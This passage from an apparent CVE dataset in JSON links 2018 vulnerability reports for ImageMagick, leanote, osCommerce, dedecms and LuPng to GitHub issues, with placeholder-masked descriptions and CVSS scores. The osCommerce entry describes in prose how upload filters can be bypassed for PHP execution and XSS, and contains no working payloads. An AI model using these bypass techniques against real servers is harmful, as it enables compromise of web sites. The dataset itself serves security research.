  27202. "Repo_new": "imagemagick/imagemagick",
  27203. "Issue_Created_At": "2018-10-19T16:20:51Z",
  27204. "description": "Memory Leak in function APITAG of msl.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There a memroy leak in function APITAG of msl.c Steps to Reproduce APITAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG e3 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG b5 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG a2 in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG bc in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG ae5 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( 
PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aec NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aec1a2 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG efbdb9 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG efcf6c in APITAG 
APITAG NUMBERTAG d NUMBERTAG ab6b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d 
NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG ab6c NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d 
NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG efcf7c in APITAG APITAG NUMBERTAG d NUMBERTAG ab6b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG e in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG e in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG 
APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG be in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in 
posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG ba2 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d6 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d 
NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG ba2 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d6 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG c1 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in 
APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG c1 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). ''' System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Tue Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  27205. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27206. "severity": "MEDIUM",
  27207. "baseScore": 6.5,
  27208. "impactScore": 3.6,
  27209. "exploitabilityScore": 2.8
  27210. },
  27211. {
  27212. "CVE_ID": "CVE-2018-18545",
  27213. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/14",
  27214. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/14",
  27215. "Repo_new": "fiyocms/fiyocms",
  27216. "Issue_Created_At": "2018-10-20T15:43:31Z",
  27217. "description": "PATHTAG $_POST FILETAG FILETAG FILETAG FILETAG",
  27218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27219. "severity": "MEDIUM",
  27220. "baseScore": 6.1,
  27221. "impactScore": 2.7,
  27222. "exploitabilityScore": 2.8
  27223. },
  27224. {
  27225. "CVE_ID": "CVE-2018-18553",
  27226. "Issue_Url_old": "https://github.com/leanote/leanote/issues/822",
  27227. "Issue_Url_new": "https://github.com/leanote/leanote/issues/822",
  27228. "Repo_new": "leanote/leanote",
  27229. "Issue_Created_At": "2018-10-20T04:34:31Z",
  27230. "description": "There is an XSS. When I set the title at the APITAG Basic Setting\", I found there is no sanitizer to filter malicious code, such as APITAG. If I click the \"likes\" button at the target's blog, when others open this blog, there is a pop-up window. APITAG",
  27231. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27232. "severity": "MEDIUM",
  27233. "baseScore": 6.1,
  27234. "impactScore": 2.7,
  27235. "exploitabilityScore": 2.8
  27236. },
  27237. {
  27238. "CVE_ID": "CVE-2018-18572",
  27239. "Issue_Url_old": "https://github.com/osCommerce/oscommerce2/issues/631",
  27240. "Issue_Url_new": "https://github.com/oscommerce/oscommerce2/issues/631",
  27241. "Repo_new": "oscommerce/oscommerce2",
  27242. "Issue_Created_At": "2018-11-05T09:03:29Z",
  27243. "description": "APITAG NUMBERTAG allows execution of several file types.. Brief of this vulnerability APITAG uses an APITAG file to prevent execution of php and html files. But it is not a complete set that prevents all malicious files. As a result, an adversary can upload several types of malicious file. This vulnerability needs the admin credentials, but it can be used to compromise the web server where APITAG is installed. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Tested version NUMBERTAG Payload & Reason of vulnerability NUMBERTAG upload point Page : Admin page > Catalog > Categories / Products > New Products Upload malicious files via product images elements. Found Harmful Files are listed below NUMBERTAG PHP Code Execution Description of vulnerability APITAG file located in APITAG directory. It prevents execution of several dangerous extensions. But its regular expression does not prevent pht extensions. As a result, a php script with pht extension can be uploaded and executed. ps. If APITAG runs on a PHP NUMBERTAG environment, the phar extension also can be executed on the server. This vulnerability is reserved as CVETAG NUMBERTAG Handle the arbitrary file to execute as PHP script Description of vulnerability The upload file filter cannot prevent uploading a new APITAG file. So, an adversary can change the APITAG file. If the APITAG file is changed, all of the PHP supported files can be executed. Even a file that has an arbitrary extension and a PHP script can be executed. This vulnerability is reserved as CVETAG NUMBERTAG Execute HTML using SVG file format Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions via which HTML can be executed. One of the extension strings is svg . 
If an adversary assembles an SVG file and an HTML file into one SVG file, that assembled SVG file can execute HTML in the client browser NUMBERTAG Execute HTML using EML file format ( IE only ) Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions via which HTML can be executed. The eml extension is not executed in other browsers, but only Internet Explorer renders HTML elements in an eml file NUMBERTAG Execute HTML using Strange file extension or No extension Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions via which HTML can be executed. A file that has no extension or a strange extension can be rendered in web browsers. Vulnerability NUMBERTAG and NUMBERTAG are about PHP Code execution via arbitrary file upload, and the others are about HTML Execution (related to XSS). These vulnerabilities need administrator credentials, but I still think it is vulnerable. I did not upload test payloads to avoid abuse of these vulnerabilities by other persons. If you need to fix these vulnerabilities, please let me know your mail. Thank you.",
  27244. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  27245. "severity": "HIGH",
  27246. "baseScore": 7.2,
  27247. "impactScore": 5.9,
  27248. "exploitabilityScore": 1.2
  27249. },
  27250. {
  27251. "CVE_ID": "CVE-2018-18579",
  27252. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/6",
  27253. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/6",
  27254. "Repo_new": "ky-j/dedecms",
  27255. "Issue_Created_At": "2018-10-22T14:06:14Z",
  27256. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG sp2. FILETAG Phink club APITAG",
  27257. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27258. "severity": "MEDIUM",
  27259. "baseScore": 6.1,
  27260. "impactScore": 2.7,
  27261. "exploitabilityScore": 2.8
  27262. },
  27263. {
  27264. "CVE_ID": "CVE-2018-18581",
  27265. "Issue_Url_old": "https://github.com/jansol/LuPng/issues/7",
  27266. "Issue_Url_new": "https://github.com/jansol/lupng/issues/7",
  27267. "Repo_new": "jansol/lupng",
  27268. "Issue_Created_At": "2018-10-21T07:15:32Z",
  27269. "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  27270. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27271. "severity": "HIGH",
  27272. "baseScore": 8.8,
  27273. "impactScore": 5.9,
  27274. "exploitabilityScore": 2.8
  27275. },
  27276. {
  27277. "CVE_ID": "CVE-2018-18582",
  27278. "Issue_Url_old": "https://github.com/jansol/LuPng/issues/9",
  27279. "Issue_Url_new": "https://github.com/jansol/lupng/issues/9",
  27280. "Repo_new": "jansol/lupng",
  27281. "Issue_Created_At": "2018-10-21T07:16:23Z",
  27282. "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
  27283. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27284. "severity": "HIGH",
  27285. "baseScore": 8.8,
  27286. "impactScore": 5.9,
  27287. "exploitabilityScore": 2.8
  27288. },
  27289. {
  27290. "CVE_ID": "CVE-2018-18583",
  27291. "Issue_Url_old": "https://github.com/jansol/LuPng/issues/8",
  27292. "Issue_Url_new": "https://github.com/jansol/lupng/issues/8",
